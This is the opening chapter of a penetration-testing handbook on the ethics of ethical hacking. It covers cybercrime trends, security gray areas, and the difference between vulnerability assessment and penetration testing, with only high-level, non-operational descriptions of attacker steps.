Ethics of Ethical Hacking

CHAPTER

1
This book has not been compiled and written to be used as a tool by individuals who
wish to carry out malicious and destructive activities. It is a tool for people who are
interested in extending or perfecting their skills to defend against such attacks and dam-
aging acts. In this chapter, we’ll discuss the following topics:

• Why you need to understand your enemy’s tactics

• Recognizing the gray areas in security
• How does this stuff relate to an ethical hacking book?
• The controversy of hacking books and classes
• Where do attackers have most of their fun?

Why You Need to Understand

Your Enemy’s Tactics
Let’s go ahead and get the commonly asked questions out of the way and move on from
there.
Was this book written to teach today’s hackers how to cause damage in more effective ways?
Answer: No. Next question.
Then why in the world would you try to teach people how to cause destruction and mayhem?
Answer: You cannot properly protect yourself from threats you do not understand.
The goal is to identify and prevent destruction and mayhem, not cause it.
I don’t believe you. I think these books are only written for profits and royalties.
Answer: This book was written to actually teach security professionals what the
bad guys already know and are doing. More royalties would be nice, too, so please
buy two copies.
Still not convinced? Why do militaries all over the world study their enemies’ tac-
tics, tools, strategies, technologies, and so forth? Because the more you know about
what your enemy is up to, the better idea you have as to what protection mechanisms
you need to put into place to defend yourself.

3
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

4
Most countries’ militaries carry out various scenario-based fighting exercises. For ex-
ample, pilot units split up into the “good guys” and the “bad guys.” The bad guys use the
same tactics, techniques, and methods of fighting as a specific enemy—Libya, Russia,
United States, Germany, North Korea, and so on. The goal of these exercises is to allow
the pilots to understand enemy attack patterns and to identify and be prepared for cer-
tain offensive actions, so they can properly react in the correct defensive manner.
This may seem like a large leap—from pilots practicing for wartime to corporations
trying to practice proper information security—but it is all about what the team is try-
ing to protect and the risks involved.
A military is trying to protect its nation and its assets. Many governments around
the world have also come to understand that the same assets they have spent millions
and perhaps billions of dollars to protect physically now face different types of threats.
The tanks, planes, and weaponry still have to be protected from being blown up, but
these same tanks, planes, and weaponry are now all run by and are dependent upon
software. This software can be hacked into, compromised, or corrupted. Coordinates of
where bombs are to be dropped can be changed. Individual military bases still need to
be protected by surveillance and military police; this is physical security. Satellites and
airplanes perform surveillance to watch for suspicious activities taking place from afar,
and security police monitor the entry points in and out of the base. These types of con-
trols are limited in monitoring all of the entry points into a military base. Because the
base is so dependent upon technology and software—as every organization is today—
and there are now so many communication channels present (Internet, extranets, wire-
less, leased lines, shared WAN lines, and so on), a different type of “security police” is
required to cover and monitor all of these entry points into and out of the base.
Okay, so your corporation does not hold top security information about the tactical
military troop movement through Afghanistan, you don’t have the speculative coordi-
nates of the location of bin Laden, and you are not protecting the launch codes of nu-
clear bombs—does that mean you do not need to have the same concerns and
countermeasures? Nope. Just as the military needs to protect its assets, you need to
protect yours.
An interesting aspect of the hacker community is that it is changing. Over the last
few years, their motivation has changed from just the thrill of figuring out how to ex-
ploit vulnerabilities to figuring out how to make revenue from their actions and getting
paid for their skills. Hackers who were out to “have fun” without any real target in mind
have, to a great extent, been replaced by people who are serious about gaining financial
benefits from their activities. Attacks are not only getting more specific, but also in-
creasing in sophistication. The following are just a few examples of this type of trend:

• One of three Indian defendants was sentenced in September 2008 for an

online brokerage hack, called one of the first federal prosecutions of a “hack,
pump, and dump” scheme, in which hackers penetrate online brokerage
accounts, buy large shares of penny stocks to inflate the price, and then net
the profits after selling shares.
• In December 2009, a Russian hacking group called the Russian Business
Network (BSN) stole tens of millions of dollars from Citibank through the
 Chapter 1: Ethics of of Ethical Hacking

5
use of a piece of malware called “Black Energy.” According to Symantec, about
half of all phishing incidents in 2008 were credited to the RBN.

PART I
• A group of Russian, Estonian, and Moldovan hackers were indicted in
November 2009, after stealing more than $9 million from a credit card
processor in one day. The hackers were alleged to have broken the encryption
scheme used at Royal Bank of Scotland’s payment processor, and then they
raised account limits, created and distributed counterfeit debit cards, and
withdrew roughly $9.4 million from more than 2,100 ATMs worldwide—in
less than 12 hours.
• Hackers using a new kind of malware made off with at least 300,000 Euros
from German banks in August of 2009. The malware wrote new bank
statements as it took money from victims’ bank accounts, changing HTML
coding on an infected machine before a user could see it.

Criminals are also using online scams in a bid to steal donations made to help
those affected by the January 2010 earthquake in Haiti and other similar disasters.
Fraudsters have set up fictitious websites or are falsely using the names of genuine
charities to trick donors into sending them donations. If you can think of the crime, it
is probably already taking place within the digital world. You can learn more about
these types of crimes at www.cybercrime.gov.
Malware is still one of the main culprits that costs companies the most amount of
money. An interesting thing about malware is that many people seem to put it in a dif-
ferent category from hacking and intrusions. The fact is malware has evolved to become
one of the most sophisticated and automated forms of hacking. The attacker only has
to put some upfront effort into developing the software, and then with no more effort
required from the attacker, the malware can do its damage over and over again. The
commands and logic within the malware are the same components that attackers used
to have to carry out manually.
Sadly, many of us have a false sense of security when it comes to malware detection.
In 2006, Australia’s CERT announced that 80 percent of antivirus software products
commonly missed new malware attacks because attackers test their malware software
against the most popular antivirus software products in the industry to hide from detec-
tion. If you compare this type of statistic with the amount of malware that hits the In-
ternet hourly, you can get a sense of the level of vulnerability we are actually faced with.
In 2008, Symantec had to write new virus signatures every 20 seconds to keep up with
the onslaught of malware that was released. This increased to every 8 seconds by 2009.
As of this writing, close to 4 million malware signatures are required for antivirus soft-
ware to be up to date.
The company Alinean has put together the cost estimates, per minute, for different
organizations if their operations are interrupted. Even if an attack or compromise is not
totally successful for the attacker (he or she does not obtain the desired asset), this in
no way means that the company remains unharmed. Many times attacks and intrusions
cause more of a nuisance and can negatively affect production and the normal depart-
ment operations, which always correlates to costing the company more money in direct
or indirect ways. These costs are shown in Table 1-1.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

6
Business Application Estimated Outage Cost per Minute
Supply chain management $11,000
E-commerce $10,000
Customer service $3,700
ATM/POS/EFT $3,500
Financial management $1,500
Human capital management $1,000
Messaging $1,000
Infrastructure $700
Table 1-1 Downtime Losses (Source: Alinean)

A conservative estimate from Gartner pegs the average hourly cost of downtime for
computer networks at $42,000. A company that suffers from worse than average down-
time of 175 hours a year can lose more than $7 million per year. Even when attacks are
not newsworthy enough to be reported on TV or talked about in security industry cir-
cles, they still negatively affect companies’ bottom lines.
As stated earlier, an interesting shift has taken place in the hacker community, from
joy riding to hacking as an occupation. Today, potentially millions of computers are
infected with bots that are controlled by specific hackers. If a hacker has infected 10,000
systems, this is her botnet, and she can use it to carry out DDoS attacks or even lease
these systems to others who do not want their activities linked to their true identities or
systems. (Botnets are commonly used to spread spam, phishing attacks, and pornogra-
phy.) The hacker who owns and runs a botnet is referred to as a bot herder. Since more
network administrators have configured their mail relays properly and blacklists have
been employed to block mail relays that are open, spammers have had to change tactics
(using botnets), which the hacking community has been more than willing to pro-
vide—for a price.
For example, the Zeus bot variant uses key-logging techniques to steal sensitive data
such as usernames, passwords, account numbers, and credit card numbers. It injects
fake HTML forms into online banking login pages to steal user data. Its botnet is esti-
mated to consist of 3.6 million compromised computers. Zeus’s creators are linked to
about $100 million in fraud in 2009 alone. Another botnet, the Koobface, is one of the
most efficient social engineering–driven botnets to date. It spreads via social network-
ing sites MySpace and Facebook with faked messages or comments from “friends.”
When a user clicks a provided link to view a video, the user is prompted to obtain a
necessary software update, like a CODEC—but the update is really malware that can
take control of the computer. By early 2010, 2.9 million computers have knowingly
been compromised. Of course, today many more computers have been compromised
than has been reported.
 Chapter 1: Ethics of of Ethical Hacking

7
Security Compromises and Trends

PART I
The following are a few specific examples and trends of security compromises
that are taking place today:

• A massive joint operation between U.S. and Egyptian law enforcement,

called “Operation Phish Pry,” netted 100 accused defendants. The two-
year investigation led to the October 2009 indictment of both American
and Egyptian hackers who allegedly worked in both countries to hack
into American bank systems, after using phishing lures to collect
individual bank account information.
• Social networking site Twitter was the target of several attacks in 2009,
one of which shut service down for more than 30 million users. The
DoS attack that shut the site down also interrupted access to Facebook
and LinkedIn, affecting approximately 300 million users in total.
• Attackers maintaining the Zeus botnet broke into Amazon’s EC2
cloud computing service in December 2009, even after Amazon’s
service had received praise for its safety and performance. The virus
that was used acquired authentication credentials from an infected
computer, accessed one of the websites hosted on an Amazon server,
and connected to the Amazon cloud to install a command and control
infrastructure on the client grid. The high-performance platform let the
virus quickly broadcast commands across the network.
• In December 2009, a hacker posted an online-banking phishing
application in the open source, mobile phone operating system
Android. The fake software showed up in the application store, used
by a variety of phone companies, including Google’s Nexus One
phone. Once users downloaded the software, they entered personal
information into the application, which was designed to look like it
came from specific credit unions.
• Iraqi insurgents intercepted live video feeds from U.S. Predator drones
in 2008 and 2009. Shiite fighters attacked some nonsecure links in
drone systems, allowing them to see where U.S. surveillance was taking
place and other military operations. It is reported that the hackers used
cheap software available online to break into the drones’ systems.
• In early 2010, Google announced it was considering pulling its search
engine from China, in part because of rampant China-based hacker
attacks, which used malware and phishing to penetrate the Gmail
accounts of human rights activists.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

8
Some hackers also create and sell zero-day attacks. A zero-day attack is one for which
there is currently no fix available and whoever is running the particular software that
contains that exploitable vulnerability is exposed with little or no protection. The code
for these types of attacks are advertised on special websites and sold to other hackers or
organized crime rings.

References
Alinean www.alinean.com/
Computer Crime & Intellectual Property Section, United States Department of
Justice www.cybercrime.gov
Federal Trade Commission, Identity Theft Site http://www.ftc.gov/bcp/edu/
microsites/idtheft/
Infonetics Research www.infonetics.com
Privacy Rights Clearinghouse, Chronology of Data Breaches, Security Breaches
2005-Present www.privacyrights.org/ar/ChronDataBreaches.htm#CP
Robot Wars: How Botnets Work (Massimiliano Romano, Simone Rosignoli,
and Ennio Giannini for hakin9) www.windowsecurity.com/articles/
Robot-Wars-How-Botnets-Work.html
Zero-Day Attack Prevention http://searchwindowssecurity.techtarget.com/
generic/0,295582,sid45_gci1230354,00.html

Recognizing the Gray Areas in Security

Since technology can be used by the good and bad guys, there is always a fine line that
separates the two. For example, BitTorrent is a peer-to-peer file sharing protocol that al-
lows individuals all over the world to share files whether they are the legal owners or
not. One website will have the metadata of the files that are being offered up, but in-
stead of the files being available on that site’s web farm, the files are located on the
user’s system who is offering up the files. This distributed approach ensures that one
web server farm is not overwhelmed with file requests, but it also makes it harder to
track down those who are offering up illegal material.
Various publishers and owners of copyrighted material have used legal means to
persuade sites that maintain such material to honor the copyrights. The fine line is that
sites that use the BitTorrent protocol are like windows for all the material others are
offering to the world; they don’t actually host this material on their physical servers. So
are they legally responsible for offering and spreading illegal content?
The entities that offer up files to be shared on a peer-to-peer sharing site are referred
to as BitTorrent trackers. Organizations such as Suprnova.org, TorrentSpy, LokiTorrent,
and Mininova are some of the BitTorrent trackers that have been sued and brought off-
 Chapter 1: Ethics of of Ethical Hacking

9
line for their illegal distribution of copyrighted material. The problem is that many of
these entities just pop up on some other BitTorrent site a few days later. BitTorrent is a

PART I
common example of a technology that can be used for good and evil purposes.
Another common gray area in web-based technology is search engine optimization
(SEO). Today, all organizations and individuals want to be at the top of each search
engine result to get as much exposure as possible. Many simple to sophisticated ways
are available for carrying out the necessary tasks to climb to the top. The proper meth-
ods are to release metadata that directly relates to content on your site, update your
content regularly, and create legal links and backlinks to other sites, etc. But, for every
legitimate way of working with search engine algorithms, there are ten illegitimate
ways. Spamdexing offers a long list of ways to fool search engines into getting a specific
site up the ladder in a search engine listing. Then there’s keyword stuffing, in which a
malicious hacker or “black hat” will place hidden text within a page. For example, if
Bob has a website that carries out a phishing attack, he might insert hidden text within
his page that targets elderly people to help drive these types of victims to his site.
There are scraper sites that take (scrape) content from another website without au-
thorization. The malicious site will make this stolen content unique enough that it
shows up as new content on the Web, thus fooling the search engine into giving it a
higher ranking. These sites commonly contain mostly advertisements and links back to
the original sites.
There are several other ways of manipulating search engine algorithms as well, for
instance, creating link farms, hidden links, fake blogs, page hijacking, and so on. The
crux here is that some of these activities are the right way of doing things and some of
them are the wrong way of doing things. Our laws have not necessarily caught up with
defining what is legal and illegal all the way down to SEO algorithm activities.

NOTE We go into laws and legal issues pertaining to various hacking

activities in Chapter 2.

There are multiple instances of the controversial concept of hactivism. Both legal
and illegal methods can be used to portray political ideology. Is it right to try and influ-
ence social change through the use of technology? Is web defacement covered under
freedom of speech? Is it wrong to carry out a virtual “sit in” on a site that provides il-
legal content? During the 2009 Iran elections, was it unethical for an individual to set
up a site that showed upheaval about the potential corrupt government elections?
When Israeli invaded Gaza, there were many website defacements, DoS attacks, and
website highjackings. The claim of what is ethical versus not ethical probably depends
upon which side the individuals making these calls reside.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

10
How Does This Stuff Relate to an
Ethical Hacking Book?
Corporations and individuals need to understand how the damage is being done so
they understand how to stop it. Corporations also need to understand the extent of the
threat that a vulnerability represents. Let’s take a very simplistic example. The company
FalseSenseOfSecurity, Inc., may allow its employees to share directories, files, and whole
hard drives. This is done so that others can quickly and easily access data as needed. The
company may understand that this practice could possibly put the files and systems at
risk, but they only allow employees to have unclassified files on their computers, so the
company is not overly concerned. The real security threat, which is something that
should be uncovered by an ethical hacker, is if an attacker can use this file-sharing ser-
vice as access into a computer itself. Once this computer is compromised, the attacker
will most likely plant a backdoor and work on accessing another, more critical system
via the compromised system.
The vast amount of functionality that is provided by an organization’s networking,
database, and desktop software can be used against them. Within each and every orga-
nization, there is the all-too-familiar battle of functionality vs. security. This is the rea-
son that, in most environments, the security officer is not the most well-liked
individual in the company. Security officers are in charge of ensuring the overall secu-
rity of the environment, which usually means reducing or shutting off many function-
alities that users love. Telling people that they cannot access social media sites, open
attachments, use applets or JavaScript via e-mail, or plug in their mobile devices to a
network-connected system and making them attend security awareness training does
not usually get you invited to the Friday night get-togethers at the bar. Instead, these
people are often called “Security Nazi” or “Mr. No” behind their backs. They are re-
sponsible for the balance between functionality and security within the company, and
it is a hard job.
The ethical hacker’s job is to find these things running on systems and networks,
and he needs to have the skill set to know how an enemy would use these things against
the organization. This work is referred to as a penetration test, which is different from
a vulnerability assessment, which we’ll discuss first.

Vulnerability Assessment
A vulnerability assessment is usually carried out by a network scanner on steroids. Some
type of automated scanning product is used to probe the ports and services on a range
of IP addresses. Most of these products can also test for the type of operating system
and application software running and the versions, patch levels, user accounts, and
services that are also running. These findings are matched up with correlating vulnera-
bilities in the product’s database. The end result is a large pile of reports that provides a
list of each system’s vulnerabilities and corresponding countermeasures to mitigate the
associated risks. Basically, the tool states, “Here is a list of your vulnerabilities and here
is a list of things you need to do to fix them.”
 Chapter 1: Ethics of of Ethical Hacking

11
To the novice, this sounds like an open and shut case and an easy stroll into net-
work utopia where all of the scary entities can be kept out. This false utopia, unfortu-

PART I
nately, is created by not understanding the complexity of information security. The
problem with just depending upon this large pile of printouts is that it was generated
by an automated tool that has a hard time putting its findings into the proper context
of the given environment. For example, several of these tools provide an alert of “High”
for vulnerabilities that do not have a highly probable threat associated with them. The
tools also cannot understand how a small, seemingly insignificant, vulnerability can be
used in a large orchestrated attack.
Vulnerability assessments are great for identifying the foundational security issues
within an environment, but many times, it takes an ethical hacker to really test and
qualify the level of risk specific vulnerabilities pose.

Penetration Testing
A penetration test is when ethical hackers do their magic. They can test many of the vul-
nerabilities identified during the vulnerability assessment to quantify the actual threat
and risk posed by the vulnerability.
When ethical hackers are carrying out a penetration test, their ultimate goal is usu-
ally to break into a system and hop from system to system until they “own” the domain
or environment. They own the domain or environment when they either have root
privileges on the most critical Unix or Linux system or own the domain administrator
account that can access and control all of the resources on the network. They do this to
show the customer (company) what an actual attacker can do under the circumstances
and current security posture of the network.
Many times, while the ethical hacker is carrying out her procedures to gain total
control of the network, she will pick up significant trophies along the way. These tro-
phies can include the CEO’s passwords, company trade-secret documentation, admin-
istrative passwords to all border routers, documents marked “confidential” held on the
CFO’s and CIO’s laptops, or the combination to the company vault. The reason these
trophies are collected along the way is so the decision makers understand the ramifica-
tions of these vulnerabilities. A security professional can go on for hours to the CEO,
CIO, or COO about services, open ports, misconfigurations, and hacker potential with-
out making a point that this audience would understand or care about. But as soon as
you show the CFO his next year’s projections, or show the CIO all of the blueprints to
the next year’s product line, or tell the CEO that his password is “IAmWearingPanties,”
they will all want to learn more about the importance of a firewall and other counter-
measures that should be put into place.

CAUTION No security professional should ever try to embarrass a customer

or make them feel inadequate for their lack of security. This is why the security
professional has been invited into the environment. He is a guest and is there
to help solve the problem, not point fingers. Also, in most cases, any sensitive
data should not be read by the penetration team because of the possibilities
of future lawsuits pertaining to the use of confidential information.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

12
The goal of a vulnerability test is to provide a listing of all of the vulnerabilities
within a network. The goal of a penetration test is to show the company how these
vulnerabilities can be used against it by attackers. From here, the security professional
(ethical hacker) provides advice on the necessary countermeasures that should be im-
plemented to reduce the threats of these vulnerabilities individually and collectively. In
this book, we will cover advanced vulnerability tools and methods as well as sophisti-
cated penetration techniques. Then we’ll dig into the programming code to show you
how skilled attackers identify vulnerabilities and develop new tools to exploit their
findings.
Let’s take a look at the ethical penetration testing process and see how it differs from
that of unethical hacker activities.

The Penetration Testing Process

1. Form two or three teams:
• Red team—The attack team
• White team—Network administration, the victim
• Blue team—Management coordinating and overseeing the test (optional)
2. Establish the ground rules:
• Testing objectives
• What to attack, what is hands-off
• Who knows what about the other team (Are both teams aware of the other?
Is the testing single blind or double blind?)
• Start and stop dates
• Legal issues
• Just because a client asks for it, doesn’t mean that it’s legal.
• The ethical hacker must know the relevant local, state, and federal laws
and how they pertain to testing procedures.
• Confidentiality/Nondisclosure
• Reporting requirements
• Formalized approval and written agreement with signatures and contact
information
• Keep this document handy during the testing. It may be needed as a
“get out of jail free” card

Penetration Testing Activities

3. Passive scanning Gather as much information about the target as possible
while maintaining zero contact between the penetration tester and the target.
Passive scanning can include interrogating:
 Chapter 1: Ethics of of Ethical Hacking

13
• The company’s website and source code

PART I
• Social networking sites
• Whois database
• Edgar database
• Newsgroups
• ARIN, RIPE, APNIC, LACNIC databases
• Google, Monster.com, etc.
• Dumpster diving
4. Active scanning Probe the target’s public exposure with scanning tools,
which might include:
• Commercial scanning tools
• Banner grabbing
• Social engineering
• War dialing
• DNS zone transfers
• Sniffing traffic
• Wireless war driving
5. Attack surface enumeration Probe the target network to identify,
enumerate, and document each exposed device:
• Network mapping
• Router and switch locations
• Perimeter firewalls
• LAN, MAN, and WAN connections
6. Fingerprinting Perform a thorough probe of the target systems to identify:
• Operating system type and patch level
• Applications and patch level
• Open ports
• Running services
• User accounts
7. Target system selection Identify the most useful target(s).
8. Exploiting the uncovered vulnerabilities Execute the appropriate attack
tools targeted at the suspected exposures.
• Some may not work.
• Some may kill services or even kill the server.
• Some may be successful.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

14
9. Escalation of privilege Escalate the security context so the ethical hacker has
more control.
• Gaining root or administrative rights
• Using cracked password for unauthorized access
• Carrying out buffer overflow to gain local versus remote control
10. Documentation and reporting Document everything found, how it was
found, the tools that were used, vulnerabilities that were exploited, the
timeline of activities, and successes, etc.

NOTE A more detailed approach to penetration methodology is presented

in Chapter 5.

What Would an Unethical Hacker Do Differently?

1. Target selection
• Motivations would be due to a grudge or for fun or profit.
• There are no ground rules, no hands-off targets, and the white team is
definitely blind to the upcoming attack.
2. Intermediaries
• The attacker launches his attack from a different system (intermediary) than
his own to make tracking back to him more difficult in case the attack is
detected.
• There may be several layers of intermediaries between the attacker and the
victim.
• Intermediaries are often victims of the attacker as well.
3. Next the attacker will proceed with penetration testing steps described
previously.
• Passive scanning
• Active scanning
• Footprinting
• Target system selection
• Fingerprinting
• Exploiting the uncovered vulnerabilities
• Escalation of privilege
4. Preserving access
• This involves uploading and installing a rootkit, backdoor, Trojan’ed
applications, and/or bots to assure that the attacker can regain access at
a later time.
 Chapter 1: Ethics of of Ethical Hacking

15
5. Covering his tracks

PART I
• Scrubbing event and audit logs
• Hiding uploaded files
• Hiding the active processes that allow the attacker to regain access
• Disabling messages to security software and system logs to hide malicious
processes and actions
6. Hardening the system
• After taking ownership of a system, an attacker may fix the open
vulnerabilities so no other attacker can use the system for other purposes.

How the attacker uses the compromised systems depends upon what his overall
goals are, which could include stealing sensitive information, redirecting financial
transactions, adding the systems to his bot network, extorting a company, etc.
The crux is that ethical and unethical hackers carry out basically the same activities
only with different intentions. If the ethical hacker does not identify the hole in the
defenses first, the unethical hacker will surely slip in and make himself at home.

The Controversy of Hacking Books and Classes

When books on hacking first came out, a big controversy arose pertaining to whether
this was the right thing to do or not. One side said that such books only increased
the attackers’ skills and techniques and created new attackers. The other side stated
that the attackers already had these skills, and these books were written to bring the
security professionals and networking individuals up to speed. Who was right? They
both were.
The word “hacking” is sexy, exciting, seemingly seedy, and usually brings about
thoughts of complex technical activities, sophisticated crimes, and a look into the face
of electronic danger itself. Although some computer crimes may take on some of these
aspects, in reality it is not this grand or romantic. A computer is just a new tool to carry
out old crimes.
Attackers are only one component of information security. Unfortunately, when
most people think of security, their minds go right to packets, firewalls, and hackers.
Security is a much larger and more complex beast than these technical items. Real secu-
rity includes policies and procedures, liabilities and laws, human behavior patterns,
corporate security programs and implementation, and yes, the technical aspects—fire-
walls, intrusion detection systems, proxies, encryption, antivirus software, hacks, cracks,
and attacks.
Understanding how different types of hacking tools are used and how certain at-
tacks are carried out is just one piece of the puzzle. But like all pieces of a puzzle, it is a
very important one. For example, if a network administrator implements a packet filter-
ing firewall and sets up the necessary configurations, he may feel the company is now
safe and sound. He has configured his access control lists to allow only “established”
traffic into the network. This means an outside source cannot send a SYN packet to
initiate communication with an inside system. If the administrator does not realize that
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

16
there are tools that allow for ACK packets to be generated and sent, he is only seeing
part of the picture here. This lack of knowledge and experience allows for a false sense
of security, which seems to be pretty common in companies around the world today.
Let’s look at another example. A network engineer configures a firewall to review
only the first fragment of a packet and not the packet fragments that follow. The engi-
neer knows that this type of “cut through” configuration will increase network perfor-
mance. But if she is not aware that there are tools that can create fragments with
dangerous payloads, she could be allowing in malicious traffic. Once these fragments
reach the inside destination system and are reassembled, the packet can be put back
together and initiate an attack.
In addition, if a company’s employees are not aware of social engineering attacks
and how damaging they can be, they may happily give out useful information to attack-
ers. This information is then used to generate even more powerful and dangerous at-
tacks against the company. Knowledge and the implementation of knowledge are the
keys for any real security to be accomplished.
So where do we stand on hacking books and hacking classes? Directly on top of a
slippery banana peel. There are currently three prongs to the problem of today’s hack-
ing classes and books. First, marketing people love to use the word “hacking” instead of
more meaningful and responsible labels such as “penetration methodology.” This
means that too many things fall under the umbrella of hacking. All of these procedures
now take on the negative connotation that the word “hacking” has come to be associ-
ated with. Second is the educational piece of the difference between hacking and ethi-
cal hacking, and the necessity of ethical hacking (penetration testing) in the security
industry. The third issue has to do with the irresponsibility of many hacking books and
classes. If these items are really being developed to help out the good guys, then they
should be developed and structured to do more than just show how to exploit a vulner-
ability. These educational components should show the necessary countermeasures
required to fight against these types of attacks and how to implement preventive mea-
sures to help ensure these vulnerabilities are not exploited. Many books and courses
tout the message of being a resource for the white hat and security professional. If you
are writing a book or curriculum for black hats, then just admit it. You will make just as
much (or more) money, and you will help eliminate the confusion between the con-
cepts of hacking and ethical hacking.

The Dual Nature of Tools

In most instances, the toolset used by malicious attackers is the same toolset used by
security professionals. A lot of people do not seem to understand this. In fact, the
books, classes, articles, websites, and seminars on hacking could be legitimately re-
named to “security professional toolset education.” The problem is that marketing
people like to use the word “hacking” because it draws more attention and paying cus-
tomers.
As covered earlier, ethical hackers go through the same processes and procedures as
unethical hackers, so it only makes sense that they use the same basic toolset. It would
not be useful to prove that attackers could not get through the security barriers with
 Chapter 1: Ethics of of Ethical Hacking

17
Tool A if attackers do not use Tool A. The ethical hacker has to know what the bad guys
are using, know the new exploits that are out in the underground, and continually keep

PART I
her skills and knowledgebase up to date. Why? Because the odds are against the com-
pany and against the security professional. The security professional has to identify and
address all of the vulnerabilities in an environment. The attacker only has to be really
good at one or two exploits, or really lucky. A comparison can be made to the U.S.
Homeland Security responsibilities. The CIA and FBI are responsible for protecting the
nation from the 10 million things terrorists could possibly think up and carry out. The
terrorist only has to be successful at one of these 10 million things.

How Are These Tools Used for Good Instead of Evil?

How would a company’s networking staff ensure that all of the employees are creating
complex passwords that meet the company’s password policy? They can set operating
system configurations to make sure the passwords are of a certain length, contain up-
per- and lowercase letters, contain numeric values, and keep a password history. But
these configurations cannot check for dictionary words or calculate how much protec-
tion is being provided from brute-force attacks. So the team can use a hacking tool to
carry out dictionary and brute-force attacks on individual passwords to actually test
their strength, as illustrated in Figure 1-1. The other choice is to go to each and every
employee and ask what his or her password is, write down the password, and eyeball it
to determine if it is good enough. Not a good alternative.

Figure 1-1 Password cracking software

Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

18
NOTE A company’s security policy should state that this type of password-
testing activity is allowed by the IT staff and security team. Breaking employees’
passwords could be seen as intrusive and wrong if management does not
acknowledge and allow for such activities to take place. Make sure you get
permission before you undertake this type of activity.

The same network staff needs to make sure that their firewall and router configura-
tions will actually provide the protection level that the company requires. They could
read the manuals, make the configuration changes, implement ACLs, and then go and
get some coffee. Or they could implement the configurations and then run tests against
these settings to see if they are allowing malicious traffic into what they thought was a
controlled environment. These tests often require the use of hacking tools. The tools
carry out different types of attacks, which allow the team to see how the perimeter de-
vices will react in certain circumstances.
Nothing should be trusted until it is tested. There is an amazing number of cases
where a company does everything seemingly correct when it comes to their infrastruc-
ture security. They implement policies and procedures, roll out firewalls, IDS, and anti-
virus, have all of their employees attend security awareness training, and continually
patch their systems. It is unfortunate that these companies put forth all the right effort
and funds only to end up on CNN as the latest victim because all of their customers’
credit card numbers were stolen and posted on the Internet. And this can happen if
they do not carry out the necessary vulnerability and penetration tests.

Recognizing Trouble When It Happens

Network administrators, engineers, and security professionals need to be able to recog-
nize when an attack is underway or when one is about to take place. It may seem as
though recognizing an attack as it is happening should be easy. This is only true for the
very “noisy” or overwhelming attacks such as denial-of-service (DoS) attacks. Many at-
tackers fly under the radar and go unnoticed by security devices and staff members. It
is important to know how different types of attacks take place so they can be properly
recognized and stopped.
Security issues and compromises are not going to go away any time soon. People
who work in positions within corporations that touch security in any way should not
try to ignore it or treat security as though it is an island unto itself. The bad guys know
that to hurt an enemy is to take out what that victim depends upon most. Today the
world is only becoming more dependent upon technology, not less. Even though ap-
plication development and network and system configuration and maintenance are
complex, security is only going to become more entwined with them. When a network
staff has a certain level of understanding of security issues and how different compro-
mises take place, they can act more effectively and efficiently when the “all hands on
deck” alarm is sounded.
It is also important to know when an attack may be around the corner. If network
staff is educated on attacker techniques and they see a ping sweep followed a day later
by a port scan, they will know that most likely in three hours their systems will be at-
tacked. There are many activities that lead up to different attacks, so understanding
 Chapter 1: Ethics of of Ethical Hacking

19
these items will help the company protect itself. The argument can be made that we
have more automated security products that identify these types of activities so that we

PART I
don’t have to see them coming. But depending upon software that does not have the
ability to put the activities in the necessary context and make a decision is very danger-
ous. Computers can outperform any human on calculations and performing repetitive
tasks, but we still have the ability to make some necessary judgment calls because we
understand the grays in life and do not just see things in 1s and 0s.
So it is important to understand that hacking tools are really just software tools that
carry out some specific type of procedure to achieve a desired result. The tools can be
used for good (defensive) purposes or for bad (offensive) purposes. The good and the
bad guys use the same exact toolset; the difference is their intent when operating these
utilities. It is imperative for the security professional to understand how to use these
tools and how attacks are carried out if he is going to be of any use to his customer and
to the industry.

Emulating the Attack

Once network administrators, engineers, and security professionals understand how
attackers work, then they can emulate their activities to carry out a useful penetration
test. But why would anyone want to emulate an attack? Because this is the only way to
truly test an environment’s security level—you must know how it will react when a real
attack is being carried out.
This book is laid out to walk you through these different steps so you can under-
stand how many types of attacks take place. It can help you develop methodologies for
emulating similar activities to test your company’s security posture.
There are already many elementary ethical hacking books available in every book-
store. The demand for these books and hacking courses over the years has reflected the
interest and the need in the market. It is also obvious that, although some people are
just entering this sector, many individuals are ready to move on to the more advanced
topic of ethical hacking. The goal of this book is to go through some of the basic ethical
hacking concepts quickly and then spend more time with the concepts that are not
readily available to you, but are unbelievably important.
Just in case you choose to use the information in this book for unintended pur-
poses (malicious activity), in the next chapters, we will also walk through several fed-
eral laws that have been put into place to scare you away from this activity. A wide range
of computer crimes are taken seriously by today’s court system, and attackers are receiv-
ing hefty fines and jail sentences for their activities. Don’t let that be you. There is just
as much fun and intellectual stimulation to be had working as a white hat—and no
threat of jail time!

Where Do Attackers Have Most of Their Fun?

Hacking into a system and environment is almost always carried out by exploiting vulner-
abilities in software. Only recently has the light started to shine on the root of the prob-
lem of successful attacks and exploits, which is flaws within software code. Most attack
methods described in this book can be carried out because of errors in the software.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition

20
It is not fair to put all of the blame on the programmers, because they have done
exactly what their employers and market have asked them to: quickly build applica-
tions with tremendous functionality. Only over the last few years has the market started
screaming for functionality and security, and the vendors and programmers are scram-
bling to meet these new requirements and still stay profitable.

Security Does Not Like Complexity

Software, in general, is very complicated, and the more functionality that we try to
shove into applications and operating systems, the more complex software will be-
come. The more complex software gets, the harder it is to predict properly how it will
react in all possible scenarios, which makes it much harder to secure.
Today’s operating systems and applications are increasing in lines of code (LOC).
Windows operating systems have approximately 40 million LOC. Unix and Linux op-
erating systems have much less, usually around 2 million LOC. A common estimate
used in the industry is that there are between 5–50 bugs per 1,000 lines of code. So a
middle of the road estimate would be that Windows 7 has approximately 1,200,000
bugs. (Not a statement of fact; just a guesstimation.)
It is difficult enough to try to logically understand and secure 40 million LOC, but
the complexity does not stop there. The programming industry has evolved from tradi-
tional programming languages to object-oriented languages, which allow for a modu-
lar approach to developing software. This approach has a lot of benefits: reusable
components, faster to market times, decrease in programming time, and easier ways to
troubleshoot and update individual modules within the software. But applications and
operating systems use each other’s components, users download different types of mo-
bile code to extend functionality, DLLs are installed and shared, and instead of applica-
tion-to-operating system communication, today many applications communicate
directly with each other. The operating system cannot control this type of information
flow and provide protection against possible compromises.
If we peek under the covers even further, we see that thousands of protocols are
